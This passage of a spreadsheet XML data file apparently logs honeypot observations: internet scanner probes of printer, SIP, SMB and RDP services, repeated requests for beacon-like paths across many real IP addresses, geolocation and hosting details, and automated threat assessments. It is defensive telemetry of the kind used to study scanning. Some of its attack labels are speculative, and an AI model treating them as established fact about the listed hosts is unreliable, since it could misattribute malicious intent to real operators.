127.0.0.1:5060;received=167.94.138.169;rport=36645'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,49612)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=47893'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,34062)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,43468)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '91.194.11.82:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://91.194.11.82:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=48490'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=33174'}}&amp;&amp;{Data_HTTP:{'Host': '94.131.118.77:40131', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77:40131', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.118.77:40131', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.4.48.242:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8aa9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="This indicates an FTP connection attempt but no data was sent or received, suggesting an attacker probing for vulnerabilities. The lack of data transfer raises suspicions of reconnaissance or scanning activity. Further analysis is needed to confirm malicious intent. &amp;&amp; Unknown IMAP activity detected, possibly a scan or login attempt. No further information available from this log entry. Activity may indicate an unauthorized attempt to access the system's email service. &amp;&amp; No FTP login attempts detected, indicating lack of malicious activity in this area. No attempts to exploit or access sensitive information via FTP have been observed. Normal service operation is likely occurring for the FTP functionality. &amp;&amp; Possible malicious activity: Unauthorized access to a database service, no local user is logged in, and a program named zgrab2 was involved. This could indicate an attempt to exploit the service for data extraction or other malicious purposes."/>
    <s v="Brute Force &amp;&amp; SQL Injection"/>
  </r>
  <r>
    <x v="71"/>
    <x v="71"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T20:25:56"/>
    <d v="2024-04-12T15:58:00"/>
    <d v="2025-04-30T20:25:56"/>
    <n v="749"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;443&amp;&amp;445&amp;&amp;22&amp;&amp;1080&amp;&amp;5900&amp;&amp;631&amp;&amp;80&amp;&amp;389&amp;&amp;9065&amp;&amp;12945&amp;&amp;8443&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="63199"/>
    <s v="CDS Global Cloud Co., Ltd"/>
    <s v="CDS Global Cloud Co., Ltd"/>
    <s v="hosting"/>
    <s v="CDS Global Cloud Co., Ltd"/>
    <s v="2016-01-12"/>
    <s v="CDSC-1"/>
    <s v="2016-01-12"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JbhH'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Imu2'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/w6Bm'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/wDOS'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/xERM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JNrS'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/pYNE'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/1hwM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/LPfZ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AoJc'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/8vLb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/UX9w'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6oMj'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/lE8t'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Nh6p'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/qLo1'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9dvI'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/INLy'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/zc8H'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TmFU'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/tA9o'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AYKw'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZY5u'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9Rih'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/VBpU'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/YkWA'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/l5Zb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9ljM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Iz4f'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': 